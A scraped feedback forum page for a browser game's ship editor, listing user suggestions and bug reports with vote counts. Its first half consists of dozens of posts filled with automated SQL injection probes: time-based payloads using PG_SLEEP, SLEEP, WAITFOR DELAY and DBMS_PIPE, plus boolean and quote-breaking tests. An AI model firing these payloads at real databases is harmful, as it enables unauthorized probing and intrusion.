• dwUQQUrL

  1-1)) OR 846=(SELECT 846 FROM PG_SLEEP(15))--

• dwUQQUrL

  1rs96rDZJ' OR 906=(SELECT 906 FROM PG_SLEEP(15))--

• dwUQQUrL

  1RUW1kCOC') OR 689=(SELECT 689 FROM PG_SLEEP(15))--

• dwUQQUrL

  1ixTfzFNB')) OR 591=(SELECT 591 FROM PG_SLEEP(15))--

• dwUQQUrL

  1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

• dwUQQUrL

  1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

• dwUQQUrL

  1

• dwUQQUrL

  1'"

• dwUQQUrL

  @@Ave42

• dwUQQUrL

  1

• dwUQQUrL

  1

• dwUQQUrLzMfa37Yu

  1

• dwUQQUrL

  1

• -1 OR 2+588-588-1=0+0+0+1 --

  1

• -1 OR 2+973-973-1=0+0+0+1

  1

• -1' OR 2+417-417-1=0+0+0+1 --

  1

• -1' OR 2+168-168-1=0+0+0+1 or 'iDFeMnZW'='

  1

• -1" OR 2+638-638-1=0+0+0+1 --

  1

• if(now()=sysdate(),sleep(15),0)

  1

• dwUQQUrL-1 waitfor delay '0:0:15' --

  1

• dwUQQUrLWP0H6zIf'; waitfor delay '0:0:15' --

  1

• dwUQQUrL

  1

• dwUQQUrL'"

  1

• @@Cs4vV

  1

• dwUQQUrL

  1

• kEMlzpAX

  1

• kEMlzpAX

  1

• kEMlzpAX

  1

• kEMlzpAX

  1SDRzLMcN

• kEMlzpAX

  1

• kEMlzpAX

  -1 OR 2+287-287-1=0+0+0+1 --

• kEMlzpAX

  -1 OR 2+826-826-1=0+0+0+1

• kEMlzpAX

  -1' OR 2+562-562-1=0+0+0+1 --

• kEMlzpAX

  -1' OR 2+115-115-1=0+0+0+1 or 'ya5DPiVj'='

• kEMlzpAX

  -1" OR 2+862-862-1=0+0+0+1 --

• kEMlzpAX

  1*if(now()=sysdate(),sleep(15),0)

• kEMlzpAX

  10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z

• kEMlzpAX

  10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z

• kEMlzpAX

  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

• kEMlzpAX

  1-1; waitfor delay '0:0:15' --

• kEMlzpAX

  1-1); waitfor delay '0:0:15' --

• kEMlzpAX

  1-1 waitfor delay '0:0:15' --

• kEMlzpAX

  1tZ2j8i94'; waitfor delay '0:0:15' --

• kEMlzpAX

  1-1 OR 66=(SELECT 66 FROM PG_SLEEP(15))--

• kEMlzpAX

  1-1) OR 390=(SELECT 390 FROM PG_SLEEP(15))--

• kEMlzpAX

  1-1)) OR 258=(SELECT 258 FROM PG_SLEEP(15))--

• kEMlzpAX

  14dV3C7Na' OR 772=(SELECT 772 FROM PG_SLEEP(15))--

• kEMlzpAX

  1hsSPT5uu') OR 530=(SELECT 530 FROM PG_SLEEP(15))--

• kEMlzpAX

  1HdNGe6Ze')) OR 992=(SELECT 992 FROM PG_SLEEP(15))--

• kEMlzpAX

  1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

• kEMlzpAX

  1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

• kEMlzpAX

  1

• kEMlzpAX

  1'"

• kEMlzpAX

  @@CVVcH

• kEMlzpAX

  1

• kEMlzpAX

  1

• kEMlzpAXH5QggnqX

  1

• kEMlzpAX

  1

• -1 OR 2+938-938-1=0+0+0+1 --

  1

• -1 OR 2+840-840-1=0+0+0+1

  1

• -1' OR 2+959-959-1=0+0+0+1 --

  1

• -1' OR 2+625-625-1=0+0+0+1 or 'RKL5iL4h'='

  1

• -1" OR 2+802-802-1=0+0+0+1 --

  1

• if(now()=sysdate(),sleep(15),0)

  1

• kEMlzpAX-1 waitfor delay '0:0:15' --

  1

• kEMlzpAXuw35IIPH'; waitfor delay '0:0:15' --

  1

• kEMlzpAX

  1

• kEMlzpAX'"

  1

• @@SOm0D

  1

• kEMlzpAX

  1

Comment

• Ship changed after being placed into the gallery
  By BeyPokéDig - 160 months ago
  Unvote

  8178 agree

• Hack Protection
  By Stealthkid - 151 months ago
  Unvote

  2952 agree

• Add to favorites
  By Anonymous - 162 months ago
  Unvote

  912 agree

• editro
  By critic - 162 months ago
  Unvote

  868 agree

• Missiles as an Third Weapon
  By Ram - 158 months ago
  Unvote

  848 agree

• Change Name?
  By Anonymous - 162 months ago
  Unvote

  841 agree

• Youtube B-wing achievement
  By chuck norris - 160 months ago
  Unvote

  840 agree

• Symmetry and Snap to grid Mode
  By Stan1023 - 118 months ago
  Unvote

  810 agree

• Slide ship in on start
  By Kickass guy - 162 months ago
  Unvote

  776 agree

• Kick Ass is Bad Ass!!
  By TheNuclearNinja - 157 months ago
  Unvote

  757 agree

• Mistaken Website Bug
  By CrazyDeathling - 160 months ago
  Unvote

  755 agree

• Rank list & Leaderboards
  By StoleYourFood - 157 months ago
  Unvote

  745 agree

• What browsers are supported?
  By Jack - 159 months ago
  Unvote

  736 agree

• It doesn't work!
  By the destructor - 161 months ago
  Unvote

  721 agree

• Awesome
  By Anonymous - 154 months ago
  Unvote

  685 agree

• Save
  By DevilishDB - 160 months ago
  Unvote

  683 agree

• Try Me does not work
  By Tim - 162 months ago
  Unvote

  676 agree

• Two major glitches
  By BeyPokéDig - 162 months ago
  Unvote

  673 agree

• Undo button
  By wombat - 159 months ago
  Unvote

  664 agree

• battle
  By alexof - 160 months ago
  Unvote

  662 agree

• Doesn't work on ismittromneythepresident.com
  By MassMurdererOver9000 - 155 months ago
  Unvote

  657 agree

• achievements
  By Lee - 162 months ago
  Unvote

  654 agree

• Posting times of feedback and feedback comments
  By BeyPokéDig - 162 months ago
  Unvote

  650 agree

• how do i draw the outline
  By kickassisdeboss - 161 months ago
  Unvote

  649 agree

• omfg
  By Russellmichael13 - 160 months ago
  Unvote

  644 agree

• Pen tool
  By Cblackdragon - 157 months ago
  Unvote

  640 agree

• White labeling the app?
  By Peter.dibart - 157 months ago
  Unvote

  623 agree

• Menu not showing up
  By Patrick.Fletcher.118 - 161 months ago
  Unvote

  616 agree

• You guys should have a symmetrical mode
  By Idrees - 161 months ago
  Unvote

  606 agree

• need some advice
  By Hao - 159 months ago
  Unvote

  603 agree

• Enemies
  By Agallup16 - 161 months ago
  Unvote

  593 agree

• Mirrored editing
  By wombat - 159 months ago
  Unvote

  592 agree

• Forums
  By BeyPokéDig - 161 months ago
  Unvote

  583 agree

• Benefits from improving ranks
  By hurrtz - 158 months ago
  Unvote

  582 agree

• Designer
  By Anonymous - 162 months ago
  Unvote

  579 agree

• Rankings
  By heyo - 161 months ago
  Unvote

  579 agree

• Pro!!
  By Jtbui20 - 161 months ago
  Unvote

  573 agree

• Button
  By Cottonball - 161 months ago
  Unvote

  570 agree

• android app
  By Barissenkal - 153 months ago
  Unvote

  567 agree

• help
  By Russellmichael13 - 160 months ago
  Unvote

  562 agree

• Extra weapons
  By MassMurdererOver9000 - 156 months ago
  Unvote

  556 agree

• Undo Button
  By Cblackdragon - 157 months ago
  Unvote

  554 agree

• I am using this on my site
  By Idrees - 161 months ago
  Unvote

  553 agree

• 1 agrees
  By BeyPokéDig - 162 months ago
  Unvote

  551 agree

• 0xp till| Only GA.
  By StoleYourFood - 157 months ago
  Unvote

  546 agree

• Image for ship
  By wombat - 159 months ago
  Unvote

  544 agree

• You guys need an undo button
  By Idrees - 161 months ago
  Vote

  529 agree

• Question
  By Kickin Ass - 161 months ago
  Unvote

  525 agree

• how come the editor is so hard to use
  By Rcasassin - 159 months ago
  Unvote

  520 agree

• page moving up/down while controling the ship?
  By Tommy - 161 months ago
  Unvote

  507 agree